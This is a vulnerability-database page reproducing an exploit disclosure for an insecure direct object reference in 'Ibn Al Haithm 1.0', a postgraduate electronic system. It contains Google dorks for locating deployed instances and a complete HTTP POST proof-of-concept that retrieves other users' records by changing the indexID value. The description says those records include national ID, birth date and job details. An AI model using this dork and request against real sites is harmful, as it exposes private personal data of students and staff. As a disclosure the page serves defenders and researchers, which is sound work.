Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Ibn Al Haithm 1.0 Insecure Direct Object Reference

🗓️ 20 May 2025 00:00:00Reported by wa0_3Type 
packetstorm
 packetstorm🔗 packetstorm.news👁 98 Views

Ibn Al Haithm 1.0 exposes personal data via indexID due to missing access control in the endpoint.

Code
#Exploit Title: Ibn Al Haithm intlaqcit.com - Multiple Vulnerabilities
    # Date: May 19, 2025
    # Exploit Author: wa0_3
    # Telegram: @wa0_3
    # Vendor Homepage: intlaqcit.com
    # Version: 1.0
    # CVE: N/A
    # Google Dork:
    intxt: Ibn Al Haithm Postgraduates Electronic System
    inurl:intlaqcit.com intext:"Ibn Al Haithm"
    ===============================================================================================================================
    #Description
    This vulnerability occurs due to lack of access control validation on the indexID parameter in the selectOnlineReadContData API endpoint. An attacker can manipulate this parameter to access sensitive data of other users, including full name, national ID, birth date, and job information — leading to a full personal data breach.
    ===============================================================================================================================
    
    Vulnerability: IDOR
    ## Proof of Concept (PoC):
    POST /getJCI HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-CSRFToken: null
    X-Requested-With: XMLHttpRequest
    Content-Length: 147
    Connection: keep-alive
    Cookie: sysDate="your cookie"
    param0=onlineReg.onlineRegData&param1=selectOnlineReadContData&param2=userID&param3=%7B%22sysLang%22%3A%22A%22%2C%22indexID%22%3A%22800024307%22%7D
    =============================================================================================================================================================================
    ## Response:
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    Connection: keep-alive
    Set-Cookie: (your cookie)
    Server: TornadoServer/4.4
    Content-Length: 1075
    {
      "rows": [{
        "dataAvailable": "True",
        "row": {
    =============================================================================================================================================================================
    # Credits:
    Discovered and reported by wa0_3
    Telegram: @wa0_3

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 May 2025 00:00Current
7.4High risk
Vulners AI Score7.4
Ibn Al Haithmdata breachindexIDselectOnlineReadContData
98